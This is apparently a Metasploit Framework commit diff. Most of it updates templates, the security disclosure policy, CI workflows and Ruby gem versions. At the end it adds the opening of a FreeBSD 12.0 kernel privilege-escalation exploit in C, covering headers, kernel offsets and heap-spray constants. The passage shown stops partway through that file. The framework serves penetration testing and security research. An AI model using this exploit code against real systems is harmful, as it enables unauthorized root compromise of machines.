automatic module_metadata_base.json update

Land #14117 ', Hyper-V VM Enumeration Module
Land #14143 , Replace erroneous calls to get_service
2020-09-17 11:03:21 -05:00 · 2020-09-17 17:52:27 +02:00 · 2020-09-17 10:41:15 -05:00 · 2020-09-17 09:46:22 -05:00 · 2020-09-17 14:19:10 +01:00 · 2020-09-16 16:10:39 -05:00
749 changed files with 44079 additions and 11440 deletions
@@ -37,24 +37,18 @@ What should happen?

 What happens instead?

-You might also want to check the last ~1k lines of
-`/opt/metasploit/apps/pro/engine/config/logs/framework.log` or
-`~/.msf4/logs/framework.log` for relevant stack traces
-
-
-## System stuff
-
 ### Metasploit version

 Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install).

-### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)
+## Additional Information
+If your version is less than `5.0.96`, please update to the latest version and ensure your issue is still present.

-### OS
-
-What OS are you running Metasploit on?
+If the issue is encountered within `msfconsole`, please run the `debug` command using the instructions below. If the issue is encountered outisde `msfconsole`, or the issue causes `msfconsole` to crash on startup, please delete this section.

+1. Start `msfconsole`
+2. Run the command `set loglevel 3`
+3. Take the steps necessary recreate your issue
+4. Run the `debug` command
+5. Copy all the output below the `===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===` line and make sure to **REMOVE ANY SENSITIVE INFORMATION.**
+6. Replace these instructions and the paragraph above with the output from step 5.
@@ -0,0 +1,35 @@
+# Reporting security issues
+
+Thanks for your interest in making Metasploit more secure! If you feel
+that you have found a security issue involving Metasploit, Meterpreter,
+Recog, or any other Rapid7 open source project, you are welcome to let
+us know in the way that's most comfortable for you.
+
+## Via ZenDesk
+
+You can click on the big blue button at [Rapid7's Vulnerability
+Disclosure][r7-vulns] page, which will get you to our general
+vulnerability reporting system. While this does require a (free) ZenDesk
+account to use, you'll get regular updates on your issue as our software
+support teams work through it. As it happens [that page][r7-vulns] also
+will tell you what to expect when it comes to reporting vulns, how fast
+we'll fix and respond, and all the rest, so it's a pretty good read
+regardless.
+
+## Via email
+
+If you're more of a traditionalist, you can email your finding to
+security@rapid7.com. If you like, you can use our [PGP key][pgp] to
+encrypt your messages, but we certainly don't mind cleartext reports
+over email.
+
+## NOT via GitHub Issues
+
+Please don't! Disclosing security vulnerabilities to public bug trackers
+is kind of mean, even when it's well-intentioned, since you end up
+dropping 0-day on pretty much everyone right out of the gate. We'd prefer
+you didn't!
+
+[r7-vulns]:https://www.rapid7.com/security/disclosure/
+[pgp]:https://keybase.io/rapid7/pgp_keys.asc?fingerprint=9a90aea0576cbcafa39c502ba5e16807959d3eda
+
@@ -92,6 +92,11 @@ pulls:

        Once there's a clear path for testing and evaluating this module, we can progress with this further.

+    needs-pull-request-template:
+      close: false
+      comment: |
+        When creating a pull request, please ensure that the default pull request template has been updated with the required details.
+
 issues:
  actions:
    termux:
@@ -105,6 +110,13 @@ issues:
        * https://wiki.termux.com/wiki/Metasploit_Framework
        * termux/termux-packages/issues/715

+    needs-issue-template:
+      close: true
+      comment: |
+        When creating an issue, please ensure that the default issue template has been updated with the required details.
+
+        Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
+
    potato:
      close: true
      comment: |
@@ -0,0 +1,36 @@
+on:
+  schedule:
+    - cron: "0 15 * * *"
+name: Stale Bot workflow
+jobs:
+  build:
+    name: stale
+    runs-on: ubuntu-latest
+    steps:
+      - name: stale
+        id: stale
+        uses: actions/stale@v3
+        with:
+          repo-token: ${{ secrets.GITHUB_TOKEN }}
+          days-before-stale: 30
+          days-before-close: 30
+          operations-per-run: 25
+          stale-issue-message: |
+            Hi!
+
+            This issue has been left open with no activity for a while now.
+
+            We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
+            If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
+
+            As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
+          close-issue-message: |
+            Hi again!
+
+            It’s been 60 days since anything happened on this issue, so we are going to close it.
+            Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
+
+            As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
+          exempt-issue-labels: |
+            not-stale,confirmed,easy,newbie-friendly,suggestion,suggestion-module,suggestion-feature,suggestion-docs
+          debug-only: false
@@ -9,6 +9,7 @@ bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>
 bwatters-r7 <bwatters-r7@github>       <bwatters@rapid7.com>
 cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
 cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
+cgranleese-r7 <cgranleese-r7@github>   <christopher_granleese@rapid7.com>
 dheiland-r7 <dheiland-r7@github>       <dh@layereddefense.com>
 dwelch-r7 <dwelch-r7@github>           <dean_welch@rapid7.com>
 ecarey-r7 <ecarey-r7@github>           <e@ipwnstuff.com>
@@ -1,14 +1,14 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (5.0.95)
-      actionpack (~> 4.2.6)
-      activerecord (~> 4.2.6)
-      activesupport (~> 4.2.6)
+    metasploit-framework (6.0.7)
+      actionpack (~> 5.2.2)
+      activerecord (~> 5.2.2)
+      activesupport (~> 5.2.2)
      aws-sdk-ec2
      aws-sdk-iam
      aws-sdk-s3
-      bcrypt (= 3.1.12)
+      bcrypt
      bcrypt_pbkdf
      bit-struct
      bson
@@ -26,12 +26,12 @@ PATH
      jsobfu
      json
      metasm
-      metasploit-concern (~> 2.0.0)
-      metasploit-credential (~> 3.0.0)
-      metasploit-model (~> 2.0.4)
-      metasploit-payloads (= 1.4.2)
-      metasploit_data_models (~> 3.0.10)
-      metasploit_payloads-mettle (= 0.5.21)
+      metasploit-concern
+      metasploit-credential
+      metasploit-model
+      metasploit-payloads (= 2.0.12)
+      metasploit_data_models
+      metasploit_payloads-mettle (= 1.0.2)
      mqtt
      msgpack
      nessus_rest
@@ -47,7 +47,7 @@ PATH
      patch_finder
      pcaprub
      pdf-reader
-      pg (~> 0.20)
+      pg
      railties
      rb-readline
      recog
@@ -71,7 +71,7 @@ PATH
      rex-text
      rex-zip
      ruby-macho
-      ruby_smb (~> 1.1)
+      ruby_smb (~> 2.0)
      rubyntlm
      rubyzip
      sinatra
@@ -89,65 +89,64 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.0.3)
-    actionpack (4.2.11.3)
-      actionview (= 4.2.11.3)
-      activesupport (= 4.2.11.3)
-      rack (~> 1.6)
-      rack-test (~> 0.6.2)
-      rails-dom-testing (~> 1.0, >= 1.0.5)
+    actionpack (5.2.4.4)
+      actionview (= 5.2.4.4)
+      activesupport (= 5.2.4.4)
+      rack (~> 2.0, >= 2.0.8)
+      rack-test (>= 0.6.3)
+      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.11.3)
-      activesupport (= 4.2.11.3)
+    actionview (5.2.4.4)
+      activesupport (= 5.2.4.4)
      builder (~> 3.1)
-      erubis (~> 2.7.0)
-      rails-dom-testing (~> 1.0, >= 1.0.5)
+      erubi (~> 1.4)
+      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (4.2.11.3)
-      activesupport (= 4.2.11.3)
-      builder (~> 3.1)
-    activerecord (4.2.11.3)
-      activemodel (= 4.2.11.3)
-      activesupport (= 4.2.11.3)
-      arel (~> 6.0)
-    activesupport (4.2.11.3)
-      i18n (~> 0.7)
+    activemodel (5.2.4.4)
+      activesupport (= 5.2.4.4)
+    activerecord (5.2.4.4)
+      activemodel (= 5.2.4.4)
+      activesupport (= 5.2.4.4)
+      arel (>= 9.0)
+    activesupport (5.2.4.4)
+      concurrent-ruby (~> 1.0, >= 1.0.2)
+      i18n (>= 0.7, < 2)
      minitest (~> 5.1)
-      thread_safe (~> 0.3, >= 0.3.4)
      tzinfo (~> 1.1)
    addressable (2.7.0)
      public_suffix (>= 2.0.2, < 5.0)
    afm (0.2.2)
-    arel (6.0.4)
+    arel (9.0.0)
    arel-helpers (2.11.0)
      activerecord (>= 3.1.0, < 7)
    ast (2.4.1)
    aws-eventstream (1.1.0)
-    aws-partitions (1.330.0)
-    aws-sdk-core (3.100.0)
+    aws-partitions (1.366.0)
+    aws-sdk-core (3.105.0)
      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.239.0)
      aws-sigv4 (~> 1.1)
      jmespath (~> 1.0)
-    aws-sdk-ec2 (1.167.0)
+    aws-sdk-ec2 (1.193.0)
      aws-sdk-core (~> 3, >= 3.99.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.40.1)
+    aws-sdk-iam (1.44.0)
      aws-sdk-core (~> 3, >= 3.99.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.34.1)
+    aws-sdk-kms (1.37.0)
      aws-sdk-core (~> 3, >= 3.99.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.68.1)
-      aws-sdk-core (~> 3, >= 3.99.0)
+    aws-sdk-s3 (1.79.1)
+      aws-sdk-core (~> 3, >= 3.104.3)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.2.0)
+    aws-sigv4 (1.2.2)
      aws-eventstream (~> 1, >= 1.0.2)
-    bcrypt (3.1.12)
+    bcrypt (3.1.16)
    bcrypt_pbkdf (1.0.1)
-    bindata (2.4.7)
+    bindata (2.4.8)
    bit-struct (0.16)
-    bson (4.9.2)
+    bson (4.10.0)
    builder (3.2.4)
    byebug (11.1.3)
    coderay (1.1.3)
@@ -155,12 +154,12 @@ GEM
    cookiejar (0.3.3)
    crass (1.0.6)
    daemons (1.3.1)
-    diff-lcs (1.3)
-    dnsruby (1.61.3)
-      addressable (~> 2.5)
+    diff-lcs (1.4.4)
+    dnsruby (1.61.4)
+      simpleidn (~> 0.1)
    docile (1.3.2)
    ed25519 (1.2.4)
-    em-http-request (1.1.6)
+    em-http-request (1.1.7)
      addressable (>= 2.3.4)
      cookiejar (!= 0.3.1)
      em-socksify (>= 0.3)
@@ -168,18 +167,18 @@ GEM
      http_parser.rb (>= 0.6.0)
    em-socksify (0.3.2)
      eventmachine (>= 1.0.0.beta.4)
-    erubis (2.7.0)
+    erubi (1.9.0)
    eventmachine (1.2.7)
-    factory_bot (5.2.0)
-      activesupport (>= 4.2.0)
-    factory_bot_rails (5.2.0)
-      factory_bot (~> 5.2.0)
-      railties (>= 4.2.0)
-    faker (2.2.1)
-      i18n (>= 0.8)
+    factory_bot (6.1.0)
+      activesupport (>= 5.0.0)
+    factory_bot_rails (6.1.0)
+      factory_bot (~> 6.1.0)
+      railties (>= 5.0.0)
+    faker (2.13.0)
+      i18n (>= 1.6, < 2)
    faraday (1.0.1)
      multipart-post (>= 1.2, < 3)
-    faye-websocket (0.10.9)
+    faye-websocket (0.11.0)
      eventmachine (>= 0.12.0)
      websocket-driver (>= 0.5.1)
    filesize (0.2.0)
@@ -188,7 +187,7 @@ GEM
    hrr_rb_ssh (0.3.0.pre2)
      ed25519 (~> 1.2)
    http_parser.rb (0.6.0)
-    i18n (0.9.5)
+    i18n (1.8.5)
      concurrent-ruby (~> 1.0)
    io-console (0.5.6)
    irb (1.2.4)
@@ -196,17 +195,17 @@ GEM
    jmespath (1.4.0)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.3.0)
-    loofah (2.6.0)
+    json (2.3.1)
+    loofah (2.7.0)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
    memory_profiler (0.9.14)
    metasm (1.0.4)
-    metasploit-concern (2.0.5)
-      activemodel (~> 4.2.6)
-      activesupport (~> 4.2.6)
-      railties (~> 4.2.6)
-    metasploit-credential (3.0.4)
+    metasploit-concern (3.0.0)
+      activemodel (~> 5.2.2)
+      activesupport (~> 5.2.2)
+      railties (~> 5.2.2)
+    metasploit-credential (4.0.2)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 3.0.0)
@@ -216,45 +215,47 @@ GEM
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (2.0.4)
-      activemodel (~> 4.2.6)
-      activesupport (~> 4.2.6)
-      railties (~> 4.2.6)
-    metasploit-payloads (1.4.2)
-    metasploit_data_models (3.0.10)
-      activerecord (~> 4.2.6)
-      activesupport (~> 4.2.6)
+    metasploit-model (3.0.0)
+      activemodel (~> 5.2.2)
+      activesupport (~> 5.2.2)
+      railties (~> 5.2.2)
+    metasploit-payloads (2.0.12)
+    metasploit_data_models (4.0.2)
+      activerecord (~> 5.2.2)
+      activesupport (~> 5.2.2)
      arel-helpers
      metasploit-concern
      metasploit-model
      pg
-      postgres_ext
-      railties (~> 4.2.6)
+      railties (~> 5.2.2)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.5.21)
+    metasploit_payloads-mettle (1.0.2)
    method_source (1.0.0)
    mini_portile2 (2.4.0)
-    minitest (5.14.1)
+    minitest (5.14.2)
    mqtt (0.5.0)
    msgpack (1.3.3)
    multipart-post (2.1.1)
+    mustermann (1.1.1)
+      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
-    net-ldap (0.16.2)
+    net-ldap (0.16.3)
    net-ssh (6.1.0)
    network_interface (0.0.2)
    nexpose (7.2.1)
-    nokogiri (1.10.9)
+    nokogiri (1.10.10)
      mini_portile2 (~> 2.4.0)
    octokit (4.18.0)
      faraday (>= 0.9)
      sawyer (~> 0.8.0, >= 0.5.3)
    openssl-ccm (1.2.2)
+    openssl-cmac (2.0.1)
    openvas-omp (0.0.4)
    packetfu (1.1.13)
      pcaprub
    parallel (1.19.2)
-    parser (2.7.1.3)
-      ast (~> 2.4.0)
+    parser (2.7.1.4)
+      ast (~> 2.4.1)
    patch_finder (1.0.2)
    pcaprub (0.13.0)
    pdf-reader (2.4.0)
@@ -263,41 +264,34 @@ GEM
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (0.21.0)
-    pg_array_parser (0.0.9)
-    postgres_ext (3.0.1)
-      activerecord (~> 4.0)
-      arel (>= 4.0.1)
-      pg_array_parser (~> 0.0.9)
+    pg (1.2.3)
    pry (0.13.1)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.9.0)
      byebug (~> 11.0)
      pry (~> 0.13.0)
-    public_suffix (4.0.5)
-    rack (1.6.13)
-    rack-protection (1.5.5)
+    public_suffix (4.0.6)
+    rack (2.2.3)
+    rack-protection (2.1.0)
      rack
-    rack-test (0.6.3)
-      rack (>= 1.0)
-    rails-deprecated_sanitizer (1.0.3)
-      activesupport (>= 4.2.0.alpha)
-    rails-dom-testing (1.0.9)
-      activesupport (>= 4.2.0, < 5.0)
-      nokogiri (~> 1.6)
-      rails-deprecated_sanitizer (>= 1.0.1)
+    rack-test (1.1.0)
+      rack (>= 1.0, < 3)
+    rails-dom-testing (2.0.3)
+      activesupport (>= 4.2.0)
+      nokogiri (>= 1.6)
    rails-html-sanitizer (1.3.0)
      loofah (~> 2.3)
-    railties (4.2.11.3)
-      actionpack (= 4.2.11.3)
-      activesupport (= 4.2.11.3)
+    railties (5.2.4.4)
+      actionpack (= 5.2.4.4)
+      activesupport (= 5.2.4.4)
+      method_source
      rake (>= 0.8.7)
-      thor (>= 0.18.1, < 2.0)
+      thor (>= 0.19.0, < 2.0)
    rainbow (3.0.0)
    rake (13.0.1)
    rb-readline (0.5.5)
-    recog (2.3.8)
+    recog (2.3.14)
      nokogiri
    redcarpet (3.5.0)
    regexp_parser (1.7.1)
@@ -347,7 +341,7 @@ GEM
      rex-socket
      rex-text
    rex-struct2 (0.1.2)
-    rex-text (0.2.26)
+    rex-text (0.2.28)
    rex-zip (0.1.3)
      rex-text
    rexml (3.2.4)
@@ -375,23 +369,26 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.9.3)
-    rubocop (0.85.1)
+    rubocop (0.90.0)
      parallel (~> 1.10)
-      parser (>= 2.7.0.1)
+      parser (>= 2.7.1.1)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.7)
      rexml
-      rubocop-ast (>= 0.0.3)
+      rubocop-ast (>= 0.3.0, < 1.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 1.4.0, < 2.0)
-    rubocop-ast (0.0.3)
-      parser (>= 2.7.0.1)
+    rubocop-ast (0.3.0)
+      parser (>= 2.7.1.4)
    ruby-macho (2.2.0)
    ruby-prof (1.4.1)
    ruby-progressbar (1.10.1)
    ruby-rc4 (0.1.5)
-    ruby_smb (1.1.0)
+    ruby2_keywords (0.0.2)
+    ruby_smb (2.0.4)
      bindata
+      openssl-ccm
+      openssl-cmac
      rubyntlm
      windows_error
    rubyntlm (0.6.2)
@@ -403,10 +400,13 @@ GEM
      docile (~> 1.1)
      simplecov-html (~> 0.11)
    simplecov-html (0.12.2)
-    sinatra (1.4.8)
-      rack (~> 1.5)
-      rack-protection (~> 1.4)
-      tilt (>= 1.3, < 3)
+    simpleidn (0.1.1)
+      unf (~> 0.1.4)
+    sinatra (2.1.0)
+      mustermann (~> 1.0)
+      rack (~> 2.2)
+      rack-protection (= 2.1.0)
+      tilt (~> 2.0)
    sqlite3 (1.3.13)
    sshkey (2.0.0)
    swagger-blocks (3.0.0)
@@ -423,16 +423,19 @@ GEM
      thread_safe (~> 0.1)
    tzinfo-data (1.2020.1)
      tzinfo (>= 1.0.0)
+    unf (0.1.4)
+      unf_ext
+    unf_ext (0.0.7.7)
    unicode-display_width (1.7.0)
-    warden (1.2.7)
-      rack (>= 1.0)
-    websocket-driver (0.7.2)
+    warden (1.2.9)
+      rack (>= 2.0.9)
+    websocket-driver (0.7.3)
      websocket-extensions (>= 0.1.0)
    websocket-extensions (0.1.5)
    windows_error (0.1.2)
-    xdr (2.0.0)
-      activemodel (>= 4.2.7)
-      activesupport (>= 4.2.7)
+    xdr (3.0.1)
+      activemodel (>= 5.2.0)
+      activesupport (>= 5.2.0)
    xmlrpc (0.3.0)
    yard (0.9.25)

@@ -1,28 +1,28 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.0.3, MIT
-actionpack, 4.2.11.3, MIT
-actionview, 4.2.11.3, MIT
-activemodel, 4.2.11.3, MIT
-activerecord, 4.2.11.3, MIT
-activesupport, 4.2.11.3, MIT
+actionpack, 5.2.4.4, MIT
+actionview, 5.2.4.4, MIT
+activemodel, 5.2.4.4, MIT
+activerecord, 5.2.4.4, MIT
+activesupport, 5.2.4.4, MIT
 addressable, 2.7.0, "Apache 2.0"
 afm, 0.2.2, MIT
-arel, 6.0.4, MIT
+arel, 9.0.0, MIT
 arel-helpers, 2.11.0, MIT
 ast, 2.4.1, MIT
 aws-eventstream, 1.1.0, "Apache 2.0"
-aws-partitions, 1.330.0, "Apache 2.0"
-aws-sdk-core, 3.100.0, "Apache 2.0"
-aws-sdk-ec2, 1.167.0, "Apache 2.0"
-aws-sdk-iam, 1.40.1, "Apache 2.0"
-aws-sdk-kms, 1.34.1, "Apache 2.0"
-aws-sdk-s3, 1.68.1, "Apache 2.0"
-aws-sigv4, 1.2.0, "Apache 2.0"
-bcrypt, 3.1.12, MIT
+aws-partitions, 1.366.0, "Apache 2.0"
+aws-sdk-core, 3.105.0, "Apache 2.0"
+aws-sdk-ec2, 1.193.0, "Apache 2.0"
+aws-sdk-iam, 1.44.0, "Apache 2.0"
+aws-sdk-kms, 1.37.0, "Apache 2.0"
+aws-sdk-s3, 1.79.1, "Apache 2.0"
+aws-sigv4, 1.2.2, "Apache 2.0"
+bcrypt, 3.1.16, MIT
 bcrypt_pbkdf, 1.0.1, MIT
-bindata, 2.4.7, ruby
+bindata, 2.4.8, ruby
 bit-struct, 0.16, ruby
-bson, 4.9.2, "Apache 2.0"
+bson, 4.10.0, "Apache 2.0"
 builder, 3.2.4, MIT
 bundler, 1.17.3, MIT
 byebug, 11.1.3, "Simplified BSD"
@@ -31,78 +31,77 @@ concurrent-ruby, 1.0.5, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.3.1, MIT
-diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
-dnsruby, 1.61.3, "Apache 2.0"
+diff-lcs, 1.4.4, "MIT, Artistic-2.0, GPL-2.0+"
+dnsruby, 1.61.4, "Apache 2.0"
 docile, 1.3.2, MIT
 ed25519, 1.2.4, MIT
-em-http-request, 1.1.6, MIT
+em-http-request, 1.1.7, MIT
 em-socksify, 0.3.2, MIT
-erubis, 2.7.0, MIT
+erubi, 1.9.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 5.2.0, MIT
-factory_bot_rails, 5.2.0, MIT
-faker, 2.2.1, MIT
+factory_bot, 6.1.0, MIT
+factory_bot_rails, 6.1.0, MIT
+faker, 2.13.0, MIT
 faraday, 1.0.1, MIT
-faye-websocket, 0.10.9, "Apache 2.0"
+faye-websocket, 0.11.0, "Apache 2.0"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
 hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.3.0.pre2, "Apache 2.0"
 http_parser.rb, 0.6.0, MIT
-i18n, 0.9.5, MIT
+i18n, 1.8.5, MIT
 io-console, 0.5.6, "Simplified BSD"
 irb, 1.2.4, "Simplified BSD"
 jmespath, 1.4.0, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.3.0, ruby
-loofah, 2.6.0, MIT
+json, 2.3.1, ruby
+loofah, 2.7.0, MIT
 memory_profiler, 0.9.14, MIT
 metasm, 1.0.4, LGPL-2.1
-metasploit-concern, 2.0.5, "New BSD"
-metasploit-credential, 3.0.4, "New BSD"
-metasploit-framework, 5.0.95, "New BSD"
-metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.4.2, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 3.0.10, "New BSD"
-metasploit_payloads-mettle, 0.5.21, "3-clause (or ""modified"") BSD"
+metasploit-concern, 3.0.0, "New BSD"
+metasploit-credential, 4.0.2, "New BSD"
+metasploit-framework, 6.0.7, "New BSD"
+metasploit-model, 3.0.0, "New BSD"
+metasploit-payloads, 2.0.12, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 4.0.2, "New BSD"
+metasploit_payloads-mettle, 1.0.2, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
 mini_portile2, 2.4.0, MIT
-minitest, 5.14.1, MIT
+minitest, 5.14.2, MIT
 mqtt, 0.5.0, MIT
 msgpack, 1.3.3, "Apache 2.0"
 multipart-post, 2.1.1, MIT
+mustermann, 1.1.1, MIT
 nessus_rest, 0.1.6, MIT
-net-ldap, 0.16.2, MIT
+net-ldap, 0.16.3, MIT
 net-ssh, 6.1.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.9, MIT
+nokogiri, 1.10.10, MIT
 octokit, 4.18.0, MIT
 openssl-ccm, 1.2.2, MIT
+openssl-cmac, 2.0.1, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 parallel, 1.19.2, MIT
-parser, 2.7.1.3, MIT
+parser, 2.7.1.4, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.0, LGPL-2.1
 pdf-reader, 2.4.0, MIT
-pg, 0.21.0, "New BSD"
-pg_array_parser, 0.0.9, unknown
-postgres_ext, 3.0.1, MIT
+pg, 1.2.3, "Simplified BSD"
 pry, 0.13.1, MIT
 pry-byebug, 3.9.0, MIT
-public_suffix, 4.0.5, MIT
-rack, 1.6.13, MIT
-rack-protection, 1.5.5, MIT
-rack-test, 0.6.3, MIT
-rails-deprecated_sanitizer, 1.0.3, MIT
-rails-dom-testing, 1.0.9, MIT
+public_suffix, 4.0.6, MIT
+rack, 2.2.3, MIT
+rack-protection, 2.1.0, MIT
+rack-test, 1.1.0, MIT
+rails-dom-testing, 2.0.3, MIT
 rails-html-sanitizer, 1.3.0, MIT
-railties, 4.2.11.3, MIT
+railties, 5.2.4.4, MIT
 rainbow, 3.0.0, MIT
 rake, 13.0.1, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.3.8, unknown
+recog, 2.3.14, unknown
 redcarpet, 3.5.0, MIT
 regexp_parser, 1.7.1, MIT
 reline, 0.1.4, "Ruby License"
@@ -122,7 +121,7 @@ rex-rop_builder, 0.1.3, "New BSD"
 rex-socket, 0.1.23, "New BSD"
 rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
-rex-text, 0.2.26, "New BSD"
+rex-text, 0.2.28, "New BSD"
 rex-zip, 0.1.3, "New BSD"
 rexml, 3.2.4, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
@@ -133,19 +132,21 @@ rspec-mocks, 3.9.1, MIT
 rspec-rails, 4.0.1, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.9.3, MIT
-rubocop, 0.85.1, MIT
-rubocop-ast, 0.0.3, MIT
+rubocop, 0.90.0, MIT
+rubocop-ast, 0.3.0, MIT
 ruby-macho, 2.2.0, MIT
 ruby-prof, 1.4.1, "Simplified BSD"
 ruby-progressbar, 1.10.1, MIT
 ruby-rc4, 0.1.5, MIT
-ruby_smb, 1.1.0, "New BSD"
+ruby2_keywords, 0.0.2, ruby
+ruby_smb, 2.0.4, "New BSD"
 rubyntlm, 0.6.2, MIT
 rubyzip, 2.3.0, "Simplified BSD"
 sawyer, 0.8.2, MIT
 simplecov, 0.18.2, MIT
 simplecov-html, 0.12.2, MIT
-sinatra, 1.4.8, MIT
+simpleidn, 0.1.1, MIT
+sinatra, 2.1.0, MIT
 sqlite3, 1.3.13, "New BSD"
 sshkey, 2.0.0, MIT
 swagger-blocks, 3.0.0, MIT
@@ -157,11 +158,13 @@ timecop, 0.9.1, MIT
 ttfunk, 1.6.2.1, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 1.2.7, MIT
 tzinfo-data, 1.2020.1, MIT
+unf, 0.1.4, "2-clause BSDL"
+unf_ext, 0.0.7.7, MIT
 unicode-display_width, 1.7.0, MIT
-warden, 1.2.7, MIT
-websocket-driver, 0.7.2, "Apache 2.0"
+warden, 1.2.9, MIT
+websocket-driver, 0.7.3, "Apache 2.0"
 websocket-extensions, 0.1.5, "Apache 2.0"
 windows_error, 0.1.2, BSD
-xdr, 2.0.0, "Apache 2.0"
+xdr, 3.0.1, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
 yard, 0.9.25, MIT
@@ -0,0 +1,3 @@
+class ApplicationRecord < ActiveRecord::Base
+  self.abstract_class = true
+end
@@ -6,7 +6,7 @@ module Metasploit
    class FilePathValidator < ActiveModel::EachValidator

      def validate_each(record, attribute, value)
-        unless ::File.file? value
+        unless value && ::File.file?(value)
          record.errors[attribute] << (options[:message] || "is not a valid path to a regular file")
        end
      end
@@ -1,4 +1,3 @@
-require File.expand_path('../rails_bigdecimal_fix', __FILE__)
 require 'rails'
 require File.expand_path('../boot', __FILE__)

@@ -9,8 +9,6 @@ GEMFILE_EXTENSIONS = [
 msfenv_real_pathname = Pathname.new(__FILE__).realpath
 root = msfenv_real_pathname.parent.parent

-require File.expand_path('../rails_bigdecimal_fix', __FILE__)
-
 unless ENV['BUNDLE_GEMFILE']
  require 'pathname'

@@ -1,11 +0,0 @@
-# Remove bigdecimal warning - start
-# https://github.com/ruby/bigdecimal/pull/115
-# https://github.com/rapid7/metasploit-framework/pull/11184#issuecomment-461971266
-# TODO: remove when upgrading from rails 4.x
-require 'bigdecimal'
-
-def BigDecimal.new(*args, **kwargs)
-  return BigDecimal(*args) if kwargs.empty?
-  BigDecimal(*args, **kwargs)
-end
-# Remove bigdecimal warning - end
@@ -0,0 +1,611 @@
+/*
+  FreeBSD 12.0-RELEASE x64 Kernel Exploit
+
+  Usage:
+    $ clang -o exploit exploit.c -lpthread
+    $ ./exploit
+*/
+// msf note: written by theflow0: https://hackerone.com/reports/826026
+
+#include <errno.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <string.h>
+#include <stddef.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <pthread.h>
+#define _KERNEL
+#include <sys/event.h>
+#undef _KERNEL
+#define _WANT_FILE
+#include <sys/file.h>
+#include <sys/filedesc.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/socket.h>
+#define _WANT_SOCKET
+#include <sys/socketvar.h>
+#include <netinet/in.h>
+#define _WANT_INPCB
+#include <netinet/in_pcb.h>
+#include <netinet/ip6.h>
+#include <netinet6/ip6_var.h>
+
+// #define FBSD12
+
+#define ELF_MAGIC 0x464c457f
+
+#define IPV6_2292PKTINFO 19
+#define IPV6_2292PKTOPTIONS 25
+
+#define TCLASS_MASTER 0x13370000
+#define TCLASS_SPRAY 0x41
+#define TCLASS_TAINT 0x42
+
+#define NUM_SPRAY_RACE 0x20
+#define NUM_SPRAY 0x100
+#define NUM_KQUEUES 0x100
+
+#ifdef FBSD12
+#define ALLPROC_OFFSET 0x1df3c38
+#else
+#define ALLPROC_OFFSET 0xf01e40
+#endif
+
+#define PKTOPTS_PKTINFO_OFFSET (offsetof(struct ip6_pktopts, ip6po_pktinfo))
+#define PKTOPTS_RTHDR_OFFSET (offsetof(struct ip6_pktopts, ip6po_rhinfo.ip6po_rhi_rthdr))
